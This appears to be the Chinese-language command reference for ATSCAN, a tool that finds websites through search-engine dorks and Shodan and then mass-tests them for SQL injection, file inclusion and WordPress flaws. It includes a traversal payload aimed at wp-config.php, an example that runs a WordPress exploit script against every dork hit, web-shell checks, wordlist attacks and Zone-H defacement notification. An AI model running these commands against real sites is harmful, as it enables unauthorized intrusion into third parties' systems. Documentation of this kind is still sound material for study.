● 代理:
Tor: --proxy [代理] [示例: --proxy socks://localhost:9050].
Proxy: --proxy [代理] 示例: --proxy http://12.32.1.5:8080
或 --proxy file 示例: --proxy my_proxies.txt
● 随机:
随机代理: --prandom [代理文件]
随机浏览器: --brandom
随机引擎: --mrandom [引擎]
● 设置请求头:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
● 搜索引擎:
搜索: atscan --dork [dork] --level [level]
搜索: atscan -d [dork] -l [level] --getlinks
设置引擎: atscan --dork [dork] --level [level] -m bing 或 google,ask,yandex 或 all
设置选择性引擎: atscan -d [dork] -l [level] -m google,bing,..
使用多个dork搜索: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
获取WordPress网站服务器: atscan -t [target] --wp
搜索+输出: atscan --dork [dorks.txt] --level [level] --save
搜索+获取电子邮件: atscan -d [dorks.txt] -l [level] --email
搜索+获取网站电子邮件: atscan --dork site:site.com --level [level] --email
搜索+获取IP地址: atscan --dork [dork] --level [level] --ips
● 正则表达式:
正则使用: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
电子邮件: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
● 重复器:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"
● 端口
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip起始)-(ip结束) --port [port] [--udp / --tcp]
atscan -t [ip] --port (端口起始)-(端口结束) [--udp / --tcp] --command "你的外部命令"
● 编码/解码:
生成MD5: --md5 [string]
编码base64: --encode64 [string]
解码base64: --decode64 [string]
● 数据:
数据: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /]
漏洞利用: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]
字典: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]
● 外部命令:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "file"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"
atscan --shodan --search [string] --apikey [API KEY] -command [外部命令]
● 多次扫描:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]
● IP定位:
atscan -t [ip/target] --geoloc
● 搜索验证:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -t [target / targets.txt] --vshell [file path]
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
atscan -t [target / targets.txt] --valid [string] --exclude [string]
● Zone-H:
atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"
● 搜索漏洞利用:
atscan --bugtraq -d [string] -l 1 例如: atscan --bugtraq -d wordpress -l 1
atscan --bugtraq -d file.txt -l 1
atscan --bugtraq -d [string] -l 1 --limit 10
● GoogleAPIS搜索
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [任意选项]
● Shodan搜索
atscan --shodan --targget [ip or host or file] --apikey [API KEY]
atscan --shodan --dork [string or file] --apikey [API KEY]
atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]
atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]
atscan --shodan --count [query or file] --apikey [API KEY]
atscan --shodan --query --apikey [API KEY]
atscan --shodan --querysearch [query or file] --apikey [API KEY]
atscan --shodan --querytags --apikey [API KEY]
atscan --shodan --myip --apikey [API KEY]
atscan --shodan --apinfo --apikey [API KEY]
atscan --shodan --services --apikey [API KEY]
atscan --shodan --ports --apikey [API KEY]
atscan --shodan --tokens [string or file] --apikey [API KEY]
● 更新工具:
atscan --update
● 卸载工具:
atscan --uninstall
● 感谢:
感谢Blackarch Linux和Dragos OS的开发者将我的项目集成到他们的系统中。
|
|